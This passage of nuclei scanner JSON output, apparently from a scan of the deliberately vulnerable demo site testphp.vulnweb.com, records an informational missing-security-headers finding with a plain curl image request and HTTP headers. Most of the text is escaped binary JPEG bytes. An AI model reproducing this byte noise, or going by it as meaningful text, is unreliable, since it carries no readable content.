ӏK\\ufffd\\ufffd\\ufffd}I\\u0003i\\\\\\ufffd\\ufffd7\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffdT\\ufffd\\u00044\\ufffdk\\ufffd\\u001d\\ufffd$\\ufffd\\ufffd;N\\u0013vm\\u0014\\ufffd\\ufffd\\ufffdܘ\\ufffdGw\\u0012|\\u0006\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\ufffd\\n\\ufffd.\\ufffdp\\ufffdt\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd皤\\u001d0\\ufffd*\\ufffd\\ufffd\\ufffd\\u001d\\ufffdSC\\u0016WV\\ufffdo\\ufffd9\\ufffd|\\ufffd\\ufffdC\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffdC\\\"4\\ufffd\\ufffd\\ufffd\\u0013R\\ufffdv\\ufffd.\\ufffd\\ufffd\\u0019\\ufffd\\u001bG\\ufffd\\ufffdVHL\\u0002\\u0006i\\ufffd\\u0006\\ufffd\\ufffd\\ufffd\\ufffdޒ]B\\nV\\ufffd\\u0019i\\ufffdl\\ufffdβ\\ufffdF\\u0012\\u001ce\\ufffd\\ufffd\\ufffdЌ\\ufffd@\\u000e\\ufffd\\u003e\\u0014\\ufffd\\ufffd\\u0016\\ufffdYԄ\\ufffdⳒN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\u0016\\ufffdu\\ufffd\\ufffd\\ufffd\\u0010BB\\ufffd\\u001c\\ufffdT\\ufffd\\ufffd\\ufffd\\u001c7\\ufffd4.\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd(\\ufffdV\\u0008B3\\ufffd\\ufffd6\\ufffdغ\\ufffd\\ufffd/\\ufffd\\u0012îu\\ufffd\\ufffd$\\ufffdW]@\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\ufffda͵\\ufffd4\\u0014\\u001a\\ufffd\\u001ey\\ufffd\\n@\\ufffd'\\ufffd\\ufffd\\u000c\\ufffd\\u0004F\\ufffd\\ufffd\\u000e\\u001a\\ufffd{\\ufffd\\ufffd\\ufffdܦ\\ufffd(\\ufffd\\ufffdFl\\ufffd\\ufffd\\ufffd*ݻ*\\ufffd\\ufffdT\\u0014\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd*\\u0007\\ufffd\\u0006i\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0010\\ufffdt\\ufffd\\ufffd\\ufffd!qw\\ufffd\\ufffdݷ\\ufffd\\u003e\\ufffd\\t\\ufffdcI\\u0011\\ufffd\\ufffdY\\ufffd[\\u00168\\ufffd\\ufffd-\\u0015t\\ufffd\\u003e\\ufffd\\ufffdP\\ufffdҳ\\u0015\\u0026`(\\ufffd\\u001a\\ufffd\\ufffdüP-\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdH\\u001dA=\\ufffd\\ufffdӕ\\u0016٭\\ufffdp\\ufffdmՙ\\ufffdtR\\u0002\\ufffd\\ufffd\\ufffd\\u000f\\ufffdw\\ufffd\\ufffd\\ufffd8G)\\u0007\\ufffdK\\ufffd]N4\\ufffdWn\\ufffd\\u0010\\ufffd\\u0003,\\ufffd\\u000cs\\u0007]\\ufffd3\\\"^HPK\\ufffdF\\ufffdH\\u001a\\ufffdp\\ufffdoDNa]K\\ufffd2\\ufffd\\ufffdHP\\u0008\\ufffd\\ufffdy\\ufffd}\\ufffd\\ufffdU\\ufffd,57=Z\\ufffdn\\ufffd\\ufffd1\\u0019c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\u0016\\u0001c\\n͉\\ufffd\\u0016\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd\\u0008\\ufffd\\ufffdJں\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffdB\\u000bn%3\\u0005\\u0000\\ufffdF\\ufffd{ֵ\\ufffd\\u001bl\\u0008B\\u0019lI\\ufffd\\ufffd))H\\ufffd\\ufffd\\u0003a\\ufffd\\u001d\\ufffd\\ufffdS\\\\\\ufffdn\\u001dYm$+)\\ufffd刐 \\ufffd\\u000c\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu'\\ufffd\\ufffd0\\ufffd\\ufffdҜ\\ufffdi!JP\\ufffd,L\\ufffd\\u0001\\u001aL\\ufffd\\ufffd\\u001fJ\\ufffd|\\ufffd,p\\ufffdKRB^t\\u0005\\ufffd\\u0000\\ufffd\\ufffd\\ufffdh;\\ufffdj\\ufffdͲ\\ufffdԧs\\ufffd\\ufffdH\\ufffdV\\ufffd\\ufffdm\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdC8\\ufffd,\\ufffd!\\ufffd\\ufffd\\ufffd;\\ufffdbg:\\ufffd\\u0004\\ufffd5\\ufffd\\u0018\\u001a\\ufffd\\ufffd.\\ufffd\\u001e\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffd\\u0002oqE\\ufffd\\u0013n\\ufffd\\ufffdR\\u001a \\ufffd\\u0002x}k\\ufffdz\\u0011\\ufffd3\\ufffd\\ufffd\\nn\\ufffd\\ufffd9n\\u0002V\\ufffd$\\ufffd\\ufffd\\ufffdQ׈\\u0002I܃\\ufffdy\\u0026 \\ufffd\\\\\\ufffdT\\ufffd\\ufffdF\\ufffdL@\\u001e\\u0002\\ufffd\\ufffd\\ufffd^\\u001e\\ufffdk\\ufffdu\\ufffd\\ufffd\\ufffdD\\u0018\\ufffd\\ufffd+\\ufffd^\\ufffd\\ufffd\\u0004\\ufffd\\u0019\\u0013\\ufffdY\\ufffd\\u0015\\ufffd\\ufffd\\u001b[莩\\ufffdħi\\ufffd\\u000f\\ufffd:\\ufffd\\ufffd\\ufffdc\\ufffd\\u003c\\u000b\\ufffd6\\u0014d\\ufffd*$\\ufffd\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd]\\ufffd\\tm\\ufffd\\ufffd\\ufffd\\ufffd\\u0002\\u000e\\ufffdR\\ufffd\\ufffdb\\ufffd\\ufffd\\ufffd)\\u0026 \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd@\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd2r\\ufffd)L\\ufffd\\u0000\\ufffd\\u0000\\ufffd\\ufffd\\ufffd,=\\ufffdш\\u000b\\ufffd”\\ufffd܅(\\t\\ufffd\\ufffd\\u0015\\ufffd\\u0004\\ufffd?:1w\\u0017\\ufffd\\ufffdZP\\ufffd\\ufffd%\\t\\ufffd`(\\ufffd\\ufffd\\ufffdD\\ufffd\\ufffd.\\ufffd \\ufffdq\\ufffd\\ufffd\\u0000!\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffdY\\ufffdw+\\ufffd\\ufffd\\u0012\\ufffd,)X\\ufffda`6\\ufffd\\u0018\\ufffd\\ufffd*x\\ufffd1\\u0014K\\ufffdZ\\ufffd\\ufffd\\u0007\\ufffdz\\ufffd,\\ufffd\\ufffdHS\\u0004\\ufffd)\\u0006\\u000c\\ufffdG\\u0001 \\ufffd\\ufffd\\ufffd\\u0018\\ufffd\\ufffdıD\\ufffd\\ufffd\\ufffd*ԭZ\\u00007\\ufffd\\ufffd\\u0015\\ufffd\\ufffd\\\\=\\t’\\ufffdR-\\ufffd\\ufffd\\ufffd\\u0010]\\ufffdh\\ufffd\\ufffd]~T\\ufffd\\ufffde(Ő\\u0005\\ufffdp\\ufffd\\ufffd\\ufffd\\u0004\\u0003\\ufffd\\u001a\\ufffd*+2kZ\\ufffd\\u0015Z\\u0000D\\u0014\\u0008\\ufffdYB9V\\ufffdp\\u0002L\\ufffdԤ\\ufffd\\ufffdIWn\\ufffd\\ufffd\\u0016\\ufffd\\ufffdm\\u0026@\\ufffd\\ufffdL\\ufffd37\\u001a\\ufffd\\ufffdRX)YЂ)\\ufffd\\ufffd \\tN\\u001eop\\ufffd/\\ufffdR\\ufffd\\ufffd\\u000eGF\\ufffdDhF\\ufffd6:\\ufffdM2ѻ\\ufffd[\\ufffd\\ufffd\\u0001SZ\\u0012\\ufffdǺ\\ufffdC\\ufffdAkv\\ufffd\\ufffdQ\\r\\ufffd\\u0018:\\ufffdH\\ufffd\\ufffdD*]\\ufffdU\\ufffdH\\n\\ufffdII\\u0013\\u001bH\\u001e\\u0015\\ufffdnQn-`(\\ufffd\\ufffd\\ufffd\\ufffdG\\u0010\\ufffd\\u0013\\ufffdv\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffd5a\\u0017\\ufffdD\\ufffd\\ufffd\\u0000\\ufffd\\ufffdu\\ufffd\\ufffd\\ufffdx\\ufffd\\u0008y\\ufffd\\ufffd\\ufffd\\u0000\\u0002#\\ufffd\\ufffd\\u001bT\\ufffd\\ufffdJ\\ufffdz\\ufffd\\u0007Q\\ufffd\\ufffdc_\\ufffdY%L(%o\\u0010hu\\ufffd7\\tZb\\u0012\\ufffd\\\"u\\ufffd\\ufffdH\\ufffdTn\\\\\\ufffdܽVT\\u0015+\\ufffd\\n\\ufffd\\u0012\\u000e\\ufffd\\ufffdX\\ufffd踸jє\\ufffd\\u001a\\ufffd~\\ufffd뫺ZD\\ufffd\\ufffd\\ufffdc0\\u0004\\u001f\\ufffdW\\ufffdd.\\ufffd\\ufffdIq3m`\\ufffd\\ufffdc9\\u0019\\u001bo\\ufffd\\ufffdY\\u003eC\\ufffd\\ufffd\\ufffd-\\ufffd%\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffd'X'\\ufffdO\\ufffd\\ufffd[\\ufffd\\ufffdn\\ufffdajNl\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd:V\\ufffd\\ufffdʄ'a\\ufffdkm$\\ufffd\\u001e\\ufffd\\ufffdS\\u0002\\ufffdy\\ufffd\\u0015\\u0003A\\ufffd_€a\\ufffd.\\ufffd\\u0001\\ufffd!#\\ufffd\\ufffd\\ufffdJ\\ufffdI\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdg \\ufffdGuk\\ufffdq`\\u0010\\ufffd\\ufffd-\\ufffd/1\\n'y\\ufffd\\ufffd/4\\ufffd25\\u0006x\\ufffd\\u0014\\ufffd\\ufffd\\u0010u\\ufffd\\u001ba\\ufffd`%:\\ufffdG\\u00045\\ufffd3j\\ufffd\\ufffdH8\\ufffd\\ufffd\\u0004\\ufffd\\u0000\\ufffdPU\\ufffd'¶1|=~\\ufffd\\ufffd[Z\\u0003-\\ufffd\\ufffd\\ufffd:\\ufffdy\\ufffd\\ufffd\\ufffd\\u001d\\u0012e-\\u0002\\ufffd$\\ufffd\\ufffd \\rD\\ufffdυ[\\ufffdR\\ufffdc\\r-)!\\u000f9\\ufffdW08\\u0008\\ufffd|\\ufffd\\u0014\\ufffd7VȄX\\u0026(ղ\\ufffds\\u0002\\u0008%*\\ufffd\\u001fޝ\\ufffd\\\\e\\u0018\\ufffd\\ufffdWn\\ufffd\\ufffd\\ufffdO\\u003e:\\ufffd\\ufffd\\ufffd\\u0026\\ufffd\\n\\u001c$fȭ\\ufffd\\ufffd@\\ufffd\\u0002\\ufffd (F\\ufffd)\\ufffd˽Ir\\u0017$\\ufffd٣qg\\n\\ufffd\\ufffd\\u0019\\ufffd\\u001b\\ufffd\\ufffd\\ufffd\\ufffd\\u0000T\\ufffd\\u000c\\u001f\\ufffd\\u001c\\ufffd6\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd(\\ufffd\\ufffd'.i\\ufffd׉\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdʙ\\ufffd;q\\ufffd\\ufffdS\\ufffd\\ufffd\\ufffdFRM\\ufffdJ\\ufffdR\\t\\ufffd\\u001b\\ufffd\\u001fÊ\\ufffd*\\u0000\\ufffd\\ufffd\\ufffd0EJ\\ufffd\\ufffd\\u0000\\ufffd\\ufffd \\u000eU\\ufffd\\u0002\\ufffd\\tY\\ufffd䟥[w\\ufffd\\n\\ufffd\\u0000Ӑ\\ufffdP\\ufffd\\ufffdW\\t5\\ufffd\\ufffd6\\ufffd\\u0001eAGI\\u001a\\u0011\\ufffdUD)eq$\\ufffdw\\ufffd|\\ufffdVR\\u0012\\ufffd\\u0008\\ufffdt\\\"L\\ufffdƄ\\ufffd\\ufffd\\t\\ufffdڛ\\ufffd\\ufffdL\\ufffds\\u001e4\\ufffd|\\ufffd\\ufffd\\u0001\\u0000\\u0001\\ufffd\\u0001\\ufffd\\ufffd\\ufffdJ\\ufffd2\\ufffdG7*\\ufffd\\ufffd\\ufffd\\ufffd\\u0026\\u000e\\ufffd\\nT\\ufffd\\ufffd\\u003c\\u0012\\ufffd\\ufffd\\ufffd\\ufffdvaCj\\ufffd\\ufffd\\ufffd\\ufffd*p\\ufffd\\ufffd\\u001b\\ufffd#\\ufffdTEڒ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdM\\u000f=\\ufffdB\\ufffd'bi\\ufffd)?\\u00029\\ufffdy-\\ufffd.V\\ufffd\\ufffd\\ufffd\\u0004\\ufffd́\\ufffd\\ufffd\\ufffd]\\ufffd:\\ufffd\\u0015\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffd\\ufffdrgi֚\\ufffd\\u001f\\ufffd\\ufffdU\\ufffd\\ufffd:xҚ\\u0007\\ufffd\\u0012\\ufffdp\\ufffdУ\\ufffdS\\ufffd\\rj\\ufffdM\\ufffd\\ufffd\\ufffd\\u0006\\ufffdx\\u0011\\ufffdR\\ufffdO\\ufffduQ\\u003c\\ufffdY\\ufffd\\u0014\\ufffd\\ufffdJ\\ufffdO}3\\ufffdQ\\ufffd懲\\u0015\\ufffdҖ\\u0000H\\u0003\\ufffd\\ufffdL٥e!*\\ufffdxD\\ufffda\\t#:\\t\\ufffd\\ufffd\\ufffdJ\\ufffd\\u0010\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\u0026*\\ufffd)\\\"\\ufffd(ˆ\\u0014aL\\u000b\\u001bR\\ufffd\\ufffd\\u001a\\ufffd\\u0010A(\\u003cx\\ufffd\\ufffdP\\ufffdJ\\ufffdUqrd\\ufffd5#6\\ufffd'\\ufffdZ\\r::\\ufffd\\ufffd\\u0010L\\ufffdsN\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffdw\\ufffd\\ufffd²z\\ufffdm*\\ufffd4\\ufffd\\u00007\\u0026\\u0016gp5=\\ufffd\\ufffdR\\ufffd\\ufffd*A\\ufffdP\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffdي\\ufffdՙ\\ufffd*%i@$\\ufffd`i\\ufffdk!\\ufffd!S\\u001a\\ufffd|\\ufffdҥ\\\\\\ufffd\\u000e\\ufffd\\ufffd$\\u0014\\ufffd\\u0002t\\ufffdj\\u00022\\ufffd@m R\\ufffdW\\ufffd1f̤\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u0017\\ufffd\\u0012\\ufffd\\ufffdp\\ufffd\\ufffdJ\\ufffd\\u0008Ե(\\ufffdcz\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdiR\\ufffdPV\\ufffd\\u000c\\ufffdy%m\\ufffd\\ufffd\\ufffd\\u001fqS%\\u00031\\u001e?*T\\ufffd\\u003eE\\u0011\\u00039\\u0011\\ufffd\\u003e\\ufffdj\\ufffd\\t\\ufffd\\u003e\\ufffdR\\ufffdQ\\u0001\\ufffdN\\ufffd\\u0014\\ufffdz\\ufffd@ޕ*Ҹ2ˑ\\ufffd\\u00026\\u001bTKBH:R\\ufffdQ\\ufffd\\u001c[I))\\u0012\\u0007q\\ufffdLI\\u0001\\u000f\\u00109q\\ufffdJ\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffdP\\ufffd\\ufffd\\\\P\\u0011=\\ufffd\\ufffdUf\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:25.519846768Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/8.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/5.jpg.tn\",\"path\":\"/pictures/5.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/5.jpg.tn\",\"request\":\"GET /pictures/5.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4428\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:12 GMT\\r\\nEtag: \\\"4dca64a1-114c\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001b\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0002\\u0003\\u0005\\u0001\\u0007\\u0006\\ufffd\\ufffd\\u00002\\u0010\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0002\\u0004\\u0006\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0000\\u0004\\u0012!1AQ\\u0013\\\"\\u00052aq\\u0006\\u0014#B\\ufffd\\ufffd\\ufffd\\ufffdR\\ufffd\\u0015b\\ufffdr\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0000\\u0001\\u0003\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000/\\u0011\\u0000\\u0001\\u0003\\u0002\\u0005\\u0001\\u0007\\u0004\\u0002\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u0011\\u0005\\u0012!1A\\u0013Qaq\\ufffd\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0006\\ufffd\\u00142\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\u001a\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd0\\ufffdV\\u0015\\ufffd\\ufffdgQ\\ufffd%XmƲ \\ufffd\\ufffdTg6\\ufffdru\\ufffdƲ0\\ufffd\\ufffdG\\n\\u003e2y\\ufffd\\ufffdd\\ufffdEV\\u0019m}3\\ufffd1\\ufffd\\ufffd\\u003c*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdqY\\u0016`\\ufffd\\ufffdd\\ufffd\\ufffd6\\ufffdk\\\"\\ufffdw\\ufffd\\ufffdr\\ufffd{0\\ufffdqY.\\ufffd\\ufffd\\u0019*\\u003e3\\ufffd\\ufffdF\\u001e\\u0013u\\ufffd\\u000c\\ufffd\\u000f\\u0018\\ufffdDu2i\\ufffd\\ufffdh.\\ufffdH\\ufffd2\\ufffd\\ufffd\\t\\u0019^Ӗ\\ufffd.z*\\ufffdJ\\ufffd\\ufffd\\u001d\\u0014\\u0002\\ufffd@2ء\\u0012\\t\\u0018=\\ufffd+\\u0012T\\u00176.\\ufffd-\\ufffd\\ufffdEcZA\\u0012,\\ufffd*\\ufffd!\\t\\u0003o\\u0007\\ufffd:\\ufffd\\u003c\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffd\\ufffdFh\\ufffdu\\ufffd'\\u000b\\u00086\\u0001\\u0026\\ufffd\\u0003\\ufffd\\ufffd\\u000c4\\r\\ufffd|\\ufffdӼ\\ufffd@\\u0005\\ufffd\\ufffd\\u003e[$LL\\r2Ѡ\\ufffd\\ufffd\\ufffd\\u0000\\u0019ƈ\\ufffd\\ufffd\\ufffdӅ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0007\\ufffd=N\\ufffd\\ufffd2\\u003ct\\ufffdR\\ufffd*Xr\\ufffdr\\ufffd\\u001d8?+\\u000b\\ufffd#2H\\ufffd\\ufffd1\\ufffd\\u0012D\\ufffdሠ\\u0006\\ufffd6\\ufffd9\\u0006\\ufffdo\\ufffd}\\ufffd\\u0001`ֻV\\ufffdV\\u000c\\ufffd\\ufffd\\ufffd./c\\ufffdY\\ufffdp\\ufffd\\ufffd4\\ufffdz\\u000fH\\ufffd\\u0011V\\n\\ufffd\\ufffd\\u001b\\ufffd\\ufffdu\\ufffd\\u0012)X\\u0005\\ufffdn\\ufffd\\ufffd:\\ufffd\\ufffdaU\\u0004\\ufffd\\ufffd\\r?\\ufffd?\\ufffd\\u0008\\ufffd\\rm^\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\r}\\ufffd\\ufffd\\nF\\ufffd\\u0019\\ufffd\\ufffdI\\u0004J\\ufffd\\u0015:\\ufffd\\u0003\\ufffdd\\ufffd?\\ufffd\\ufffdSϬ\\ufffd\\ufffd$!\\ufffdj\\u0004\\ufffd6\\ufffd_\\ufffd_\\u001fk\\ufffd\\r\\u0000\\\\\\ufffd\\ufffdUM4\\ufffd(\\u0008\\u0016\\u0017$\\ufffd\\ufffd\\ufffd\\ufffdt\\ufffd\\ufffd\\ufffdx$\\u000e\\u0019\\u0003q\\ufffd#ʚ\\ufffd\\u003e\\ufffd+\\u001a9\\ufffd3\\ufffd;V\\ufffd\\ufffd8\\ufffd\\ufffdc\\ufffd\\ufffdLz\\u0007Ӽ\\ufffd6\\ufffd53\\ufffd\\u0012\\ufffdeZ8\\t4\\u0018\\ufffd\\ufffd\\ufffdJ\\ufffd\\u001c\\u000e\\ufffd\\ufffd4\\ufffd@\\ufffd\\ufffdM\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd\\u0005EF\\ufffdr9*H\\ufffd(qV\\u000b\\ufffd\\ufffd\\ufffd,\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdm\\ufffd\\ufffd%\\ufffd \\ufffd\\u0006\\ufffdB\\ufffdp\\ufffd\\u0004\\ufffd1b\\u0010\\ufffd\\ufffdj9$\\ufffd}?\\ufffd\\ufffd\\ufffd,[M\\ufffd\\ufffd\\ufffd\\u0001\\u001b\\ufffdkQ\\u001dױ\\ufffd`\\ufffd+l\\ufffdiqf\\ufffd\\ufffd\\ufffd\\ufffdWw\\ufffd%+\\u0018\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffd$\\ufffdp/8󿡣\\ufffd@\\ufffd\\ufffd\\ufffdr\\ufffdE\\ufffdk\\u001d\\ufffd6\\u003c\\ufffd\\u0008\\ufffd\\ufffdc\\u0006\\ufffdIYX\\ufffd\\ufffd\\ufffd/\\ufffdq\\ufffd\\ufffdR:\\u0018\\ufffd5\\n^%e\\u001eǐ\\ufffd\\u0007\\ufffd\\ufffdU}\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\u0026\\ufffd\\ufffdR\\ufffd\\ufffd)\\u0000\\u0012H\\ufffd\\ufffd\\u0000\\r\\ufffd\\ufffd\\ufffd\\u003c\\ufffd9\\ufffd\\u0026\\ufffdW\\ufffdI6\\ufffd?a?9\\ufffd\\ufffd\\ufffd!\\ufffduR\\ufffd\\u0000\\ufffd51\\u003e\\ufffd\\u000e\\ufffd\\ufffd\\u001e\\u001dDl-8;ā\\ufffd\\ufffd\\ufffd\\ufffd\\u00006\\u000f?B\\u0000\\u001b\\\\n\\ufffdjꧠ\\ufffd\\ufffdq~c\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd\\ufffd$SH\\ufffd\\u00132L\\ufffd@\\ufffdW\\ufffd*ё\\ufffdf\\ufffdz\\ufffd\\ufffd\\u0000+\\ufffd\\ufffdm9\\ufffd\\ufffd\\ufffd\\u0014\\ufffdb*\\ufffd\\ufffdV\\ufffdZ4o\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd\\u001a\\ufffdٷJʭ\\ufffdH\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000ex\\ufffd\\ufffd\\u001b\\ufffd(\\ufffd\\ufffd%\\ufffd;+\\ufffd\\ufffdU0\\ufffd\\ufffdXKo\\ufffd\\ufffd\\ufffdhi\\ufffd\\r4~\\ufffd\\ufffd~`\\ufffd\\ufffd(b»\\ufffdz׎\\ufffd\\ufffd\\ufffd\\ufffdh@`\\ufffd\\ufffd\\ufffd6\\ufffdeGݶ\\ufffd\\u0000\\ufffdV\\u0008\\ufffd\\u0005\\ufffdʦ\\ufffd\\ufffd\\ufffd6\\ufffd\\ufffd\\ufffd\\r\\ufffd;\\ufffd\\u001d\\t\\ufffd\\u0000@\\ufffd\\ufffds\\ufffdC\\u0014r\\ufffdR3\\u001f\\ufffd\\ufffd2\\t\\u0014i\\ufffd\\ufffd\\ufffdTG\\ufffd:\\u0010\\u0008\\ufffd\\ufffd\\ufffdB\\ufffd'\\ufffd(\\\\e\\ufffdp\\ufffd |\\ufffdR\\ufffd.\\ufffd\\u000b\\ufffd\\ufffd\\ufffdt\\u0005\\ufffd\\ufffd\\u0002C\\ufffd\\ufffd7\\u0016\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\ufffd8\\ufffd\\u0007M\\ufffdE$,\\ufffd\\u0026\\u0014\\u000e\\ufffd\\u003c\\ufffd\\u0007\\ufffd\\ufffd\\u001d\\t\\ufffd4\\ufffdJҼ\\ufffd~\\ufffd\\ufffd9jC,d\\ufffdف\\u001c\\u0001\\ufffd;\\ufffd\\u0000]\\ufffd\\u0007kZ߇\\ufffd\\ufffdP\\ufffd\\ufffd\\u0015\\ufffd2\\ufffd(k\\ufffd\\ufffd/\\ufffd\\u0011\\ufffdM\\ufffd\\ufffd\\ufffd:\\ufffdd\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd林ԝ\\ufffdCpX\\ufffd\\ufffd8\\ufffd/\\ufffd\\u0016\\u003c\\ufffd\\u001c\\ufffd8\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffdkkb\\ufffdu\\u0011G/\\ufffd^O\\ufffdT\\u0014x\\ufffd}Gׯ\\ufffdŠ\\ufffdsJ\\u0015\\ufffde\\n\\ufffdw\\ufffdZW\\u0000\\ufffd\\r\\u001e/\\ufffdW{]{\\u0005\\ufffd\\ufffdUQ22]a}{\\ufffd\\u003e]OK\\ufffd\\ufffdF\\ufffd*D\\u0026\\ufffd7;\\ufffd\\ufffd{\\ufffd\\ufffdQ\\u0010\\ufffd\\ufffd\\ufffdC\\ufffdP\\ufffdG\\ufffd\\ufffd\\ufffd\\ufffdv(\\u0001\\ufffd\\ufffdO8\\ufffdZWi\\ufffd\\ufffd\\u0001i#4֥A\\ufffdш\\ufffd\\ufffdsW]\\ufffd\\ufffd\\u0013$\\ufffd4N\\u001fiV\\ufffdn\\ufffd\\u0006